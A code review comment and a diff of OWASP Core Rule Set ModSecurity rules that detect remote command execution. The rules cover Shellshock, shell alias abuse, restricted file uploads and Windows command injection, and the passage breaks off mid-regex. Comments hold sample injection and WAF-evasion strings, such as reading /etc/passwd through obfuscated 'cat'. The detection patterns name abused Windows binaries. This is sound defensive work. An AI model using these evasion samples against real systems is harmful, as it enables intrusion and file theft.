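Review bot: 932170 keeps `t:none,t:urlDecode,` while this commit strips `t:urlDecodeUni` from the ARGS-based rules (932160 in the `@@ -482` hunk here, 932130 and 932140 earlier); the asymmetry looks intentional — REQUEST_LINE and REQUEST_HEADERS are, as far as I know, not pre-decoded by the engine the way ARGS are — but nothing in the file records that, so a later consistency cleanup could drop the decode and blind the Shellshock check. Suggest a comment above the SecRule: `# t:urlDecode is kept deliberately: REQUEST_LINE/REQUEST_HEADERS are not URL-decoded by the engine, unlike ARGS`. The move to `phase:1` is reasonable for header-only targets, though it means the rule's anomaly-score setvars now run before any phase-2 logic; a short note saying the earlier phase is chosen so Shellshock payloads are scored before the body is read would document the trade-off. 932170's remaining action lines continue outside this hunk.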
@@ -525,11 +600,10 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \
tag:'OWASP_CRS',\
tag:'capec/1000/152/248/88',\
tag:'PCI/6.5.2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \
"id:932171,\
@@ -547,153 +621,1045 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +# [ Unix shell alias detection ] # -# -=[ Restricted File Upload ]=- +# Detects Unix shell alias invocations in any context. # -# Detects attempts to upload a file with a forbidden filename. +# Example: +# GET /?rce=alias%20a=b # -# Many application contain Unrestricted File Upload vulnerabilities. -# https://www.owasp.org/index.php/Unrestricted_File_Upload +# Shell aliasing can be performed to substitute anything in commands, escaping # -# These might be abused to upload configuration files or other files -# that affect the behavior of the web server, possibly causing remote -# code execution. +# References: https://pubs.opengroup.org/onlinepubs/007904975/basedefs/xbd_chap03.html#tag_03_10 : +# "In the shell command language, a word consisting solely of underscores, digits, and alphabetics +# from the portable character set and any of the following characters: '!', '%', ',', '@'." # -SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ - "@pmFromFile restricted-upload.data" \ - "id:932180,\ +# Implementations may allow other characters within alias names as an extension. +# +# Regular expression generated from regex-assembly/932175.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932175 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s\b[\s\v]+[!-\"%',0-9@-Z_a-z]+=[^\s\v]" \ + "id:932175,\ phase:2,\ block,\ capture,\ - t:none,t:lowercase,\ - msg:'Restricted File Upload Attempt',\ + t:none,\ + msg:'Remote Command Execution: Unix shell alias invocation',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # -# -=[ Rule 932200 ]=- +# -=[ Restricted File Upload ]=- # -# Block RCE Bypass using different techniques: -# - uninitialized variables 
(https://www.secjuice.com/web-application-firewall-waf-evasion/) -# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) -# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) +# Detects attempts to upload a file with a forbidden filename. # -# Examples: -# - foo;cat$u+/etc$u/passwd -# - bar;cd+/etc;/bin$u/ca*+passwd -# - foo;ca\t+/et\c/pa\s\swd -# - foo;c'at'+/etc/pa's'swd +# Many application contain Unrestricted File Upload vulnerabilities. +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload # -# Regex notes: https://regex101.com/r/JgZFRi/7 +# These might be abused to upload configuration files or other files +# that affect the behavior of the web server, possibly causing remote +# code execution. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ([*?`\\'][^/\n]+/|\$[({\[#a-zA-Z0-9]|/[^/]+?[*?`\\'])" \ - "id:932200,\ +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ + "@pmFromFile restricted-upload.data" \ + "id:932180,\ phase:2,\ block,\ capture,\ - t:none,t:lowercase,t:urlDecodeUni,\ - msg:'RCE Bypass Technique',\ + t:none,\ + msg:'Restricted File Upload Attempt',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-rce',\ - tag:'paranoia-level/2',\ + tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule MATCHED_VAR "@rx /" "t:none,t:urlDecodeUni,chain" - SecRule MATCHED_VAR "@rx \s" "t:none,t:urlDecodeUni,\ - setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + 
setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# [ Windows command injection ] # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. # - -# Missing Unix commands have been added to a new word list i.e. -# util/regexp-assemble/regexp-932106.txt -# These commands may have a higher risk of false positives. -# Therefore, they have been split off to a separate rule in PL3. -# For explanation of this rule, see rule 932100. +# New in CRSv4: The rules 932110 and 932115 were reorganized and renumbered to 932370 and 932380. +# The new rules target specific Windows binaries to simplify future updates of the command list. # -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# A command injection takes a form such as: # -# Then insert the assembled regexp into this template: +# foo.jpg&ver /r +# foo.jpg|ver /r # -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* -# [regexp assembled from util/regexp-assemble/regexp-932106.txt] -# \b" \ +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. # -# This rule is a stricter sibling of rule 932100. 
- -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:(?:(?:a[\\\\'\"]*p[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*u[\\\\'\"]*d|u[\\\\'\"]*p[\\\\'\"]*2[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t)[\\\\'\"]*e|d[\\\\'\"]*n[\\\\'\"]*f|v[\\\\'\"]*i)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*(?:a[\\\\'\"]*c[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*(?:\s|<|>).*|w[\\\\'\"]*d|s)|w[\\\\'\"]*(?:(?:\s|<|>).*|h[\\\\'\"]*o))\b" \ - "id:932106,\ - phase:2,\ - block,\ - capture,\ - t:none,\ - msg:'Remote Command Execution: Unix Command Injection',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-shell',\ - tag:'platform-unix',\ - tag:'attack-rce',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/152/248/88',\ - tag:'PCI/6.5.2',\ - tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" - +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in CMD syntax, such as: ; | & ` # -# -=[ Bypass Rule 930120 (wildcard) ]=- +# Anatomy of the regexp: # -# When Paranoia Level is set to 1 and 2, a Remote Command Execution -# could be exploited bypassing rule 930120 (OS File Access Attempt) -# by using wildcard characters. +# 1. Starting tokens +# +# ; ;cmd +# \{ {cmd +# \| |cmd +# \|\| ||cmd +# & &cmd +# && &&cmd +# \n \ncmd +# \r \rcmd +# ` `cmd +# +# 2. Command prefixes +# +# ( (cmd) +# , ,cmd +# @ @cmd +# ' 'cmd' +# " "cmd" +# \s spacing+cmd +# +# 3. 
Paths +# +# [\w'\"\./]+/ /path/cmd +# [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c C:\Program Files\cmd +# [\^\.\w '\"/\x5c]*\x5c)?[\"\^]* \\net\share\dir\cmd +# +# 4. Quoting +# +# \" "cmd" +# \^ ^cmd +# +# 5. Extension/switches +# +# \.[\"\^]*\w+ cmd.com, cmd.exe, etc. +# /b cmd/h +# +# An effort is made to combat evasions by CMD syntax; for example, +# the following strings are valid: c^md, @cmd, "c"md. ModSecurity +# has a t:cmdLine transformation built-in to deal with some of these, +# but unfortunately, that transformation replaces ';' characters (so +# we cannot match on the start of a command) and '\' characters (so we +# have trouble matching paths). This makes the regexp more complex. +# +# This rule is case-insensitive. +# +# Regular expression generated from regex-assembly/932370.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932370 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ 
\"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:c[\"\^]*c[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*c[\"\^]*k[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e|d[\"\^]*(?:p[\"\^]*l[\"\^]*u[\"\^]*s|v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k)|(?:g[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*o|s[\"\^]*p[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*_[\"\^]*c[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*i[\"\^]*l[\"\^]*e)[\"\^]*r|p[\"\^]*p[\"\^]*(?:i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*e[\"\^]*r|v[\"\^]*l[\"\^]*p)|t[\"\^]*(?:[\s\v,\.-/;-<>].*|b[\"\^]*r[\"\^]*o[\"\^]*k[\"\^]*e[\"\^]*r))|b[\"\^]*(?:a[\"\^]*s[\"\^]*h|g[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:d[\"\^]*b|e[\"\^]*r[\"\^]*t[\"\^]*(?:o[\"\^]*c|r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|l[\"\^]*_[\"\^]*(?:i[\"\^]*n[\"\^]*v[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*a[\"\^]*s[\"\^]*s[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*l[\"\^]*y|m[\"\^]*u[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*i[\"\^]*e[\"\^]*r[\"\^]*s)|m[\"\^]*(?:d(?:[\"\^]*(?:k[\"\^]*e[\"\^]*y|l[\"\^]*3[\"\^]*2))?|s[\"\^]*t[\"\^]*p)|o[\"\^]*(?:m[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*s|n[\"\^]*(?:f[\"\^]*i[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*r[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*p[\"\^]*o[\"\^]*l[\"\^]*i[\"\^]*c[\"\^]*y|h[\"\^]*o[\"\^]*s[\"\^]*t|t[\"\^]*r[\"\^]*o[\"\^]*l)|r[\"\^]*e[\"\^]*g[\"\^]*e[\"\^]*n)|r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|s[\"\^]*(?:c(?:[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)?|i)|u[\"\^]*s[\"\^]*t[\"\^]*o[\"\^]*m[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t)|d[\"\^]*(?:a[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|e[\"\^]*(?:f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|s[\"\^]*k(?:[\"\^]*t[\"\^]*o[\"\^]*p[\"\^]*i[\"\^]*m[\"\^]*g[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*d[\"\^]*r)?|v[\"\^]*(?:i[\"\^]*c[\"
\^]*e[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*d[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*a[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y[\"\^]*m[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r))|f[\"\^]*s[\"\^]*(?:h[\"\^]*i[\"\^]*m|v[\"\^]*c)|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|s[\"\^]*k[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|n[\"\^]*(?:s[\"\^]*c[\"\^]*m[\"\^]*d|x)|o[\"\^]*t[\"\^]*n[\"\^]*e[\"\^]*t|u[\"\^]*m[\"\^]*p[\"\^]*6[\"\^]*4|x[\"\^]*c[\"\^]*a[\"\^]*p)|e[\"\^]*(?:s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*w[\"\^]*r|x[\"\^]*(?:c[\"\^]*e[\"\^]*l|p[\"\^]*(?:a[\"\^]*n[\"\^]*d|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|t[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*r[\"\^]*t|r[\"\^]*a[\"\^]*c[\"\^]*3[\"\^]*2)))|f[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*s[\"\^]*t|g[\"\^]*e)[\"\^]*r|l[\"\^]*t[\"\^]*m[\"\^]*c|o[\"\^]*r[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|s[\"\^]*(?:i(?:[\"\^]*a[\"\^]*n[\"\^]*y[\"\^]*c[\"\^]*p[\"\^]*u)?|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*p)|g[\"\^]*(?:f[\"\^]*x[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*w[\"\^]*r[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*e[\"\^]*r|p[\"\^]*s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|h[\"\^]*h|i[\"\^]*(?:e[\"\^]*(?:4[\"\^]*u[\"\^]*i[\"\^]*n[\"\^]*i[\"\^]*t|a[\"\^]*d[\"\^]*v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*r[\"\^]*a[\"\^]*m[\"\^]*e)|l[\"\^]*a[\"\^]*s[\"\^]*m|m[\"\^]*e[\"\^]*w[\"\^]*d[\"\^]*b[\"\^]*l[\"\^]*d|n[\"\^]*(?:f[\"\^]*d[\"\^]*e[\"\^]*f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l|s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*u[\"\^]*t[\"\^]*i)[\"\^]*l)|j[\"\^]*s[\"\^]*c|l[\"\^]*(?:a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*-[\"\^]*v[\"\^]*s[\"\^]*d[\"\^]*e[\"\^]*v[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|d[\"\^]*i[\"\^]*f[\"\^]*d[\"\^]*e)|m[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*-[
\"\^]*b[\"\^]*d[\"\^]*e|v[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t)|f[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|i[\"\^]*c[\"\^]*r[\"\^]*o[\"\^]*s[\"\^]*o[\"\^]*f[\"\^]*t|m[\"\^]*c|p[\"\^]*c[\"\^]*m[\"\^]*d[\"\^]*r[\"\^]*u[\"\^]*n|s[\"\^]*(?:(?:b[\"\^]*u[\"\^]*i[\"\^]*l|o[\"\^]*h[\"\^]*t[\"\^]*m[\"\^]*e)[\"\^]*d|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|d[\"\^]*(?:e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y|t)|h[\"\^]*t[\"\^]*(?:a|m[\"\^]*l)|i[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c|p[\"\^]*u[\"\^]*b|x[\"\^]*s[\"\^]*l))|n[\"\^]*(?:e[\"\^]*t[\"\^]*s[\"\^]*h|t[\"\^]*d[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f|f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e[\"\^]*s[\"\^]*c[\"\^]*a[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|n[\"\^]*e[\"\^]*d[\"\^]*r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*a[\"\^]*l[\"\^]*o[\"\^]*n[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*r|p[\"\^]*e[\"\^]*n[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e)|p[\"\^]*(?:c[\"\^]*(?:a[\"\^]*l[\"\^]*u[\"\^]*a|w[\"\^]*(?:r[\"\^]*u[\"\^]*n|u[\"\^]*t[\"\^]*l))|(?:e[\"\^]*s[\"\^]*t[\"\^]*e|s)[\"\^]*r|(?:k[\"\^]*t[\"\^]*m[\"\^]*o|u[\"\^]*b[\"\^]*p[\"\^]*r)[\"\^]*n|n[\"\^]*p[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|o[\"\^]*w[\"\^]*e[\"\^]*r[\"\^]*p[\"\^]*n[\"\^]*t|r[\"\^]*(?:e[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|i[\"\^]*n[\"\^]*t(?:[\"\^]*b[\"\^]*r[\"\^]*m)?|o[\"\^]*(?:c[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|t[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*l[\"\^]*h[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*e[\"\^]*r)))|r[\"\^]*(?:a[\"\^]*s[\"\^]*a[\"\^]*u[\"\^]*t[\"\^]*o[\"\^]*u|c[\"\^]*s[\"\^]*i|(?:d[\"\^]*r[\"\^]*l[\"\^]*e[\"\^]*a[\"\^]*k[\"\^]*d[\"\^]*i[\"\^]*a|p[\"\^]*c[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|e[\"\^]*(?:g(?:[\"\^]*(?:a[\"\^]*s[\"\^]*m|e[\"\^]*d[\"\^]*i[\"\^]*t|i[\"\^]*(?:n[\"\^]*i|s[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*-[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*
p[\"\^]*r[\"\^]*o[\"\^]*v[\"\^]*i[\"\^]*d[\"\^]*e[\"\^]*r)|s[\"\^]*v[\"\^]*(?:c[\"\^]*s|r[\"\^]*3[\"\^]*2)))?|(?:m[\"\^]*o[\"\^]*t|p[\"\^]*l[\"\^]*a[\"\^]*c)[\"\^]*e)|u[\"\^]*n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|(?:e[\"\^]*x[\"\^]*e|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*p[\"\^]*e[\"\^]*r|o[\"\^]*n[\"\^]*c[\"\^]*e))|s[\"\^]*(?:c[\"\^]*(?:[\s\v,\.-/;-<>].*|h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|r[\"\^]*i[\"\^]*p[\"\^]*t[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r)|e[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*s|t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*y[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|u[\"\^]*p[\"\^]*a[\"\^]*p[\"\^]*i)|h[\"\^]*(?:d[\"\^]*o[\"\^]*c[\"\^]*v[\"\^]*w|e[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2)|q[\"\^]*(?:l[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p[\"\^]*e[\"\^]*r|(?:t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*)?p[\"\^]*s)|u[\"\^]*i[\"\^]*r[\"\^]*r[\"\^]*e[\"\^]*l)|s[\"\^]*h|t[\"\^]*o[\"\^]*r[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g|y[\"\^]*(?:n[\"\^]*c[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*v[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*l[\"\^]*i[\"\^]*s[\"\^]*h[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*v[\"\^]*e[\"\^]*r|s[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p))|t[\"\^]*(?:e[\"\^]*[\s\v,\.-/;-<>].*|r[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*e[\"\^]*r|t[\"\^]*(?:d[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t|t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r))|u[\"\^]*(?:n[\"\^]*r[\"\^]*e[\"\^]*g[\"\^]*m[\"\^]*p[\"\^]*2|p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e|r[\"\^]*l|t[\"\^]*i[\"\^]*l[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*f[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s)|v[\"\^]*(?:b[\"\^]*c|e[\"\^]*r[\"\^]*c[\"\^]*l[\"\^]*s[\"\^]*i[\"\^]*d|i[\"\^]*s[\"\^]*u[\"\^]*a[\"\^]*l[\"\^]*u[\"\^]*i[\"\^]*a[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y[\"\^]*n[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*v[\"\^]*e|s[\"\^]*(?:i[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h|j[\"\^]*i[\"\^]*t[\"\^]*d[\"\^]*e[\"\^]*b[\"\^]*u[\"\^]*g[\"\^]
